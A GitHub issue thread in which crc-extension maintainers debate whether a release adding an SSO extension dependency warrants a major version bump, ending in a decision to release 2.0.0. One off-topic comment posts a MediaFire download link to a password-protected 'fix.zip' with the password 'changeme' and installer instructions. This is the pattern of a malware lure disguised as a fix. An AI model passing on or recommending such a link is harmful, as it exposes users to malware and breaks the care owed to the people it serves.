### ISSUE TITLE
Next release should be a major release not a minor release given the backwards compatibility breakage

### ISSUE THREAD

**Issue by cbr7** [crc-org/crc-extension#288]
Given that currently on main branch the change that adds a dependency on SSO was added from issue https://github.com/crc-org/crc-extension/issues/200 I think the next release should be a major one, not just a minor one, in order to flag the fact that backwards compatibility will break if the user alerady has SSO extension installed but not updated to required version.

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by dgolovin** [comment]
@odockal Interesting use case and I have not checked it. Would automatic update work when new version has a dependency to another extension? Would that extension be installed?

**Comment by dgolovin** [comment]
@odockal just verified on my fork repo that we can release it as major version 2.0.0 and release script works. 

@jeffmaury I think it is a good idea to release as major version. WDYT?

**Comment by jeffmaury** [comment]
> @odockal just verified on my fork repo that we can release it as major version 2.0.0 and release script works. 
> 
> @jeffmaury I think it is a good idea to release as major version. WDYT?

I would prefer minor bump as there are many issues to fix before major bump

**Comment by odockal** [comment]
@jeffmaury Like release 1.4.0 containing bug fixes and then 2.0.0 with external dependency?

**Comment by jeffmaury** [comment]
> @jeffmaury Like release 1.4.0 containing bug fixes and then 2.0.0 with external dependency?

No 1.4.0 will contain SSO integration

2.0.0 is for making the workflows better handled

**Comment by dgolovin** [comment]
Fix for the release build is merged. I am going to release it as 2.0.0 and closing this issue.
